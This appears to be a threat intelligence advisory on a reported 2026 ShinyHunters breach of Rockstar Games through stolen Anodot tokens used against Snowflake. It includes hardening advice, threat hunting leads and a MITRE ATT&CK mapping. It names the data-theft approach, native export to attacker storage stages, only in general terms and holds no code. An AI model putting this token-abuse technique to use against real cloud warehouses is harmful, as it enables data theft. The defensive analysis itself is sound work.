Shiny Hunters | Data Breach | Extortion | SaaS Compromise | Anodot
Source Material: Security Affairs | Technology: Anodot, Snowflake, SasS Integrations, APIs | Targeted Industries: Gaming & Entertainment, Telecommunications, Technology & SaaS, Financial Services, Manufacturing, Energy & Utilities
Executive Summary
On April 11, 2026, the financially motivated cybercriminal group ShinyHunters announced they had breached Rockstar Games. Rather than directly attacking Rockstar’s infrastructure or exploiting a flaw in Snowflake, the attackers compromised Anodot, a software-as-a-service (SaaS) cloud analytics platform used by the game developer. By stealing authentication tokens from Anodot, the attackers were able to masquerade as a legitimate internal service and extract data directly from Rockstar’s Snowflake environment. Rockstar confirmed the incident, stating that only a limited amount of non-material company data was accessed and that player information remains unaffected. However, following the expiration of their April 14 ransom deadline, threat intelligence reports indicate ShinyHunters has begun releasing the stolen information, which allegedly includes corporate financial data.
Threat Overview and Strategic Impact
ShinyHunters is a well-known hacking group active since 2020, specializing in targeting identity systems, API keys, and third-party integrations to steal large datasets. In this campaign, they bypassed traditional perimeter defenses by targeting Anodot, a vendor with trusted access to Rockstar’s Snowflake instances. The stolen authentication tokens allowed the threat actors to conduct normal database export operations that blended in with regular administrative traffic, significantly delaying detection.
The strategic impact highlights the growing risk of supply chain and third-party integration vulnerabilities. While Rockstar Games maintains that the breach is limited to non-material internal assets and does not affect players or the upcoming release of Grand Theft Auto VI, the exposure of corporate documents, revenue splits, and platform agreements poses a significant reputational and operational risk. Furthermore, this incident is part of a broader campaign by ShinyHunters targeting Anodot and Salesforce integrations, affecting numerous other telecommunications and technology organizations globally.
Security Hardening and Recommendations
To protect against similar third-party integration compromises, organizations should implement the following measures:
- Token Management: Enforce strict, automated rotation for authentication tokens and API keys. Long-lived tokens present a significant risk if a trusted third party is breached.
- Principle of Least Privilege: Audit third-party SaaS permissions. Ensure applications like Anodot only possess the minimum read/write access necessary to function within cloud warehouses like Snowflake.
- Egress Monitoring: Implement robust monitoring for abnormal data extraction. Automatically flag or block sudden, massive data transfers to unrecognized IP addresses, even if the traffic originates from a trusted service account.
- Multi-Factor Authentication (MFA): Where supported, enforce MFA or conditional access policies (such as IP allowlisting) even for automated service accounts to limit the utility of stolen tokens.
Detection
Due to the fact that this incident involved a third-party SaaS platform (Anodot) and a cloud data warehouse (Snowflake) using legitimate authentication tokens, standard endpoint and network detections may not trigger. Organizations should monitor cloud audit logs (e.g., Snowflake access logs) for:
- Unusual data export volumes initiated by service accounts.
- Logins from unexpected geographic locations or untrusted IP ranges using valid third-party tokens.
How Deepwatch Protects Our Customers
- Detection: We are reviewing existing detections associated with identified TTPs to ensure coverage, developing new detections as applicable, and we have raised awareness around related alerting to our SOC.
- Threat Intelligence: Our teams are reviewing TTPs, related reporting, and monitoring for IOCs to feed into our detection platform.
Threat Hunting Leads
- Anomalous Source IPs for Service Accounts: Review cloud data warehouse access logs (e.g., Snowflake LOGIN_HISTORY) for successful authentications by third-party service accounts originating from IP addresses or ASNs outside of the vendor’s historically observed baseline or published IP ranges.
- Data Export Volume Spikes: Analyze database query logs (e.g., Snowflake QUERY_HISTORY) for an unusually high volume of data extraction commands (such as massive SELECT statements or COPY INTO commands) executed by SaaS integration accounts.
- Unauthorized External Stage Creation: Monitor cloud environments for the sudden creation of new, unrecognized external storage stages or data shares. Attackers may attempt to route stolen data to their own AWS S3 or Azure Blob storage buckets using native database commands.
- User-Agent Anomalies: Investigate API authentication logs for service accounts using unexpected or generic User-Agent strings (e.g., standard Python scripts, cURL, or Postman) rather than the expected proprietary User-Agent of the trusted third-party application.
- Off-Hours Service Account Activity: Baseline the normal operational hours and frequency of third-party monitoring tools (like Anodot). Alert on sudden, sustained spikes in activity or data queries occurring outside of these expected automated windows.
Technical Artifacts
At this time, specific Indicators of Compromise (IoCs) such as malicious IP addresses or file hashes have not been publicly disclosed, as the attackers utilized legitimate authentication tokens and abused native database export features to evade initial detection. The Deepwatch Threat Intel team will continue to monitor for related IOCs and add them to our threat intelligence platform to feed alerting as they become available.
Threat Object Mapping
Intrusion Set: ShinyHunters
Attack Pattern (MITRE ATT&CK):
| Tactic | Technique | Technique ID | Associated Threat Activity |
| Initial Access | Compromise Supply Chain | T1195 | The threat actors compromised Anodot, a third-party cloud cost monitoring tool, to bypass Rockstar’s primary perimeter defenses. |
| Credential Access | Steal Application Access Token | T1528 | Attackers extracted authentication tokens from the compromised Anodot environment that were trusted by Rockstar’s infrastructure. |
| Initial Access, Persistence, Defense Evasion | Valid Accounts: Cloud Accounts | T1078.004 | ShinyHunters used the stolen Anodot SaaS tokens to seamlessly authenticate into Rockstar’s Snowflake data warehouses, masquerading as a legitimate service. |
| Collection | Data from Cloud Storage | T1530 | The attackers targeted and collected corporate, financial, and marketing data stored within the Snowflake cloud environment. |
| Exfiltration | Exfiltration Over Web Service | T1567 | Data was exfiltrated using native database export features, blending in with standard administrative traffic to evade detection. |
Vulnerability:
- None explicitly identified / No CVEs disclosed.
- The attackers did not exploit a traditional software vulnerability in Rockstar’s or Snowflake’s infrastructure. Instead, they compromised a trusted third-party vendor (Anodot) to steal valid SaaS authentication tokens, exploiting the broad access policies of the integration itself.
Malware/Tools:
- No specific malware identified.
- The attackers utilized a “Living off the Land” (LotL) approach. By using the stolen authentication tokens, they masqueraded as a legitimate service and abused native database tools and export features within Snowflake to extract the data.
Additional Sources
- Rockstar Games receives “pay or leak” warning after cyberattack
- GTA 6 Developer Rockstar Reportedly Hacked, Data Being Ransomed
- ShinyHunters Claims Rockstar Games Snowflake Breach via Anodot
- ShinyHunters Claims Massive Rockstar Games Breach Via Anodot-Snowflake Integration
- Rockstar Games: ShinyHunters Ransomware Attack & Data Breach 2026
Share